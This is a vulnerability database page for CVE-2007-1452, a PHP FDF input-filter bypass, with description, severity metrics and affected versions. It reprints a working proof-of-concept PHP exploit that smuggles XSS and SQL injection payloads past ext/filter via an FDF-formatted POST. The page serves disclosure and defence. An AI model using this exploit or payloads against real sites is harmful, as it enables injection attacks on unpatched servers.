CVE-2007-1452 : Detail

CVE-2007-1452

1.26%V3
Network
2007-03-14
18h00 +00:00
2024-09-16
18h55 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The FDF support (ext/fdf) in PHP 5.2.0 and earlier does not implement the input filtering hooks for ext/filter, which allows remote attackers to bypass web site filters via an application/vnd.fdf formatted POST.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3452

Publication date : 2007-03-09 23h00 +00:00
Author : Stefan Esser
EDB Verified : Yes

<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP ext/filtet FDF POST Filter Bybass Exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // _POST is the array that will be sent to the url in $url $_POST = array(); $_POST['var1'] = "<script>alert(/XSS/);</script>"; $_POST['var2'] = " ' UNION SELECT "; $url = "http://127.0.0.1/info.php"; // You do not need to change anything below this $outfdf = fdf_create(); foreach ($_POST as $key => $value) { fdf_set_value($outfdf, $key, $value, 0); } fdf_save($outfdf, "outtest.fdf"); fdf_close($outfdf); $ret = file_get_contents("outtest.fdf"); unlink("outtest.fdf"); $params = array('http' => array( 'method' => 'POST', 'content' => $ret, 'header' => 'Content-Type: application/vnd.fdf' )); $ctx = stream_context_create($params); $fp = @fopen($url, 'rb', false, $ctx); if (!$fp) { die("Cannot open $url"); } $response = @stream_get_contents($fp); echo $response; echo "\n"; ?> # milw0rm.com [2007-03-10]

Products Mentioned

Configuraton 0

Php>>Php >> Version 5.0

    Php>>Php >> Version 5.0

      Php>>Php >> Version 5.0

        Php>>Php >> Version 5.0.0

        Php>>Php >> Version 5.0.1

        Php>>Php >> Version 5.0.2

        Php>>Php >> Version 5.0.3

        Php>>Php >> Version 5.0.4

        Php>>Php >> Version 5.0.5

        Php>>Php >> Version 5.1.0

        Php>>Php >> Version 5.1.1

        Php>>Php >> Version 5.1.2

        Php>>Php >> Version 5.1.3

        Php>>Php >> Version 5.1.4

        Php>>Php >> Version 5.1.5

        Php>>Php >> Version 5.1.6

        Php>>Php >> Version 5.2.0

        References

        http://www.securityfocus.com/bid/22906
        Tags : vdb-entry, x_refsource_BID